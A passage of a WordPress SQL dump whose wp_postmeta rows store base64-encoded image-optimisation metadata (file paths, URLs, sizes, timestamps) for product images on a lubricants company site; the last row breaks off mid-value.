INSERT INTO `wp_postmeta` VALUES (28719, 3163, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC5qcGciLCJ3aWR0aCI6MTM4OCwiaGVpZ2h0Ijo1NjAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC5qcGciLCJyZWR1Y3Rpb24iOjIxNzgwNiwidGltZSI6MTQ4MzU0NzAwNiwiaWQiOiIzMTYzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwMTAsImlkIjozMTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTgwMHgzMjMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0IjozMjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtODAweDMyMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC04MDB4MzIzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzAxMywiaWQiOjMxNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtNzY4eDMxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjMxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC03Njh4MzEwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTc2OHgzMTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDE1LCJpZCI6MzE2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwMTgsImlkIjozMTYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzAyMCwiaWQiOjMxNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDIyLCJpZCI6MzE2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9Lcnl0b3gtWFAtQ29tcGFyaXNvbi1DaGFydC01MTB4NTYwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NTYwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL0tyeXRveC1YUC1Db21wYXJpc29uLUNoYXJ0LTUxMHg1NjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvS3J5dG94LVhQLUNvbXBhcmlzb24tQ2hhcnQtNTEweDU2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwMjUsImlkIjozMTYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28720, 3162, 'wpfc_optimisation_reduction', '187304'); 
INSERT INTO `wp_postmeta` VALUES (28721, 3162, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QuanBnIiwid2lkdGgiOjEwMTMsImhlaWdodCI6NDY5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC5qcGciLCJyZWR1Y3Rpb24iOjE4NzI5NywidGltZSI6MTQ4MzU0NzAzMywiaWQiOiIzMTYyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwMzYsImlkIjozMTYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtODAweDM3MC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjM3MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTgwMHgzNzAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC04MDB4MzcwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzAzOCwiaWQiOjMxNjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC03Njh4MzU2LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MzU2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtNzY4eDM1Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTc2OHgzNTYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDQxLCJpZCI6MzE2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwNDQsImlkIjozMTYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzA0NiwiaWQiOjMxNjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDQ4LCJpZCI6MzE2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtc2Nhci10ZXN0LTUxMHg0NjkuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo0NjksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXNjYXItdGVzdC01MTB4NDY5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1zY2FyLXRlc3QtNTEweDQ2OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwNTIsImlkIjozMTYyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28722, 3161, 'wpfc_optimisation_reduction', '182164'); 
INSERT INTO `wp_postmeta` VALUES (28723, 3161, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QuanBnIiwid2lkdGgiOjEwMTgsImhlaWdodCI6NDg4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC5qcGciLCJyZWR1Y3Rpb24iOjE4MjE1NywidGltZSI6MTQ4MzU0NzA2MiwiaWQiOiIzMTYxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwNjUsImlkIjozMTYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtODAweDM4My5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjM4MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTgwMHgzODMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC04MDB4MzgzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzA2OCwiaWQiOjMxNjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC03Njh4MzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtNzY4eDM2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTc2OHgzNjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDczLCJpZCI6MzE2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwNzUsImlkIjozMTYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzA3OCwiaWQiOjMxNjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MDgwLCJpZCI6MzE2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtYmVhcmluZy10ZXN0LTUxMHg0ODguanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo0ODgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWJlYXJpbmctdGVzdC01MTB4NDg4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1iZWFyaW5nLXRlc3QtNTEweDQ4OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcwODMsImlkIjozMTYxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28724, 3155, 'wpfc_optimisation_reduction', '507981'); 
INSERT INTO `wp_postmeta` VALUES (28725, 3155, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzcuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjYyLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny5qcGciLCJyZWR1Y3Rpb24iOjUwNzk3NCwidGltZSI6MTQ4MzU0NzA5NiwiaWQiOiIzMTU1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTM0MHgzNDAuanBnIiwid2lkdG